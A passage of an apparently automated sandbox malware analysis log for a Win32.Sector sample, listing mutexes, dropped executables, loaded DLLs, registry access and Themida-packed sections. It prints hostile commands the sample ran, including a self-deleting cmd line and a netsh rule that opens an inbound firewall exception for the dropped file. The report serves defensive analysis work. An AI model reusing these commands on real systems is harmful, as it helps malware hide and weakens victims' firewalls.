        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6188_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_928_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1028_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\winlogon.exeM_584_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6176_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sppsvc.exeM_4576_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_764_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\lsass.exeM_640_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3296_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1124_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_5320_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_7132_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_3332_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1584_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_652_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_2072_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6228_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2300_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6260_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_784_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_4472_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_4852_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\memory compressionM_1568_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\officeclicktorun.exeM_2648_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_6264_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_376_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_5384_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2608_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_2192_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_4244_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2432_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1248_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6336_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1656_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_2992_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\dashost.exeM_4228_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4160_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3452_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_1004_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_880_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3032_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2756_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_5644_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_5572_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_1284_
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_3132_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\dwm.exeM_992_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_1420_
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | File created: C:\Users\user\AppData\Local\Temp\winfpnht.exe
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | File read: C:\Windows\system.ini
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SELECT [OperationOrder], [Id], [OperationType], [AppId], [PackageIdHash], [AppActivityId], [ActivityType], [ParentActivityId], [Tag], [Group], [MatchId], [LastModifiedTime], [ExpirationTime], [Payload], [Priority], [CreatedTime], [PlatformDeviceId], [CreatedInCloud], [StartTime], [EndTime], [LastModifiedOnClient], [CorrelationVector], [GroupAppActivityId], [ClipboardPayload], [EnterpriseId], [UserActionState], [IsRead], [OriginalPayload], [OriginalLastModifiedOnClient], [UploadAllowedByPolicy], [PatchFields], [ThrottleReleaseTime], [OperationExpirationTime], [GroupItems], [DdsDeviceId]FROM [ActivityOperation] Dk;O
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | ReversingLabs: Detection: 94%
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | String found in binary or memory: F-STOPW.
        Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Process created: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Process created: C:\Windows\SysWOW64\cmd.exe /a /c ping 127.0.0.1 -n 3&del "C:\Users\user\Desktop\SECURI~1.EXE"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Process created: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe "C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
        Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe "C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: mpr.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: wininet.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: sfc.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: sfc_os.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Section loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: mpr.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: wininet.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: sfc.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: sfc_os.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: netutils.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: drprov.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: winsta.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: ntlanman.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: davclnt.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: davhlpr.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Section loaded: wkscli.dll
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: browcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dll
        Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dll
        Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: dxcore.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: iertutil.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile written: C:\Windows\system.iniJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic file information: File size 2496512 > 1048576
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x24b600
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sedSmibSjDOiaD.exe, 0000002E.00000000.3877127117.0000000000A9E000.00000002.00000001.01000000.0000000A.sdmp
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_01443B60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,lstrcpy,lstrcat,RegOpenKeyExA,GetModuleFileNameA,wsprintfA,lstrlen,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,GetWindowsDirectoryA,lstrlen,lstrcat,GetComputerNameA,lstrlen,lstrlen,lstrcpy,GetUserNameA,lstrlen,lstrcpy,lstrlen,lstrlen,GetTempPathA,lstrlen,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrlen,lstrcat,CreateFileMappingA,lstrlen,GetTickCount,wsprintfA,lstrlen,wsprintfA,lstrcat,GetSystemDirectoryA,lstrlen,lstrcat,lstrcat,lstrcat,GlobalAlloc,GlobalAlloc,1_2_01443B60
        Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name: .imports
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name: .themida
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name: .boot
        Source: jvauyc32.exe.1.drStatic PE information: section name:
        Source: jvauyc32.exe.1.drStatic PE information: section name:
        Source: jvauyc32.exe.1.drStatic PE information: section name:
        Source: jvauyc32.exe.1.drStatic PE information: section name:
        Source: jvauyc32.exe.1.drStatic PE information: section name: .imports
        Source: jvauyc32.exe.1.drStatic PE information: section name: .themida
        Source: jvauyc32.exe.1.drStatic PE information: section name: .boot
        Source: msedge.exe.10.drStatic PE information: section name: .00cfg
        Source: msedge.exe.10.drStatic PE information: section name: .gxfg
        Source: msedge.exe.10.drStatic PE information: section name: .retplne
        Source: msedge.exe.10.drStatic PE information: section name: CPADinfo
        Source: msedge.exe.10.drStatic PE information: section name: LZMADEC
        Source: msedge.exe.10.drStatic PE information: section name: _RDATA
        Source: msedge.exe.10.drStatic PE information: section name: malloc_h
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_00AB6690 push eax; ret 1_2_00AB66BE
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_01448060 push eax; ret 1_2_0144808E
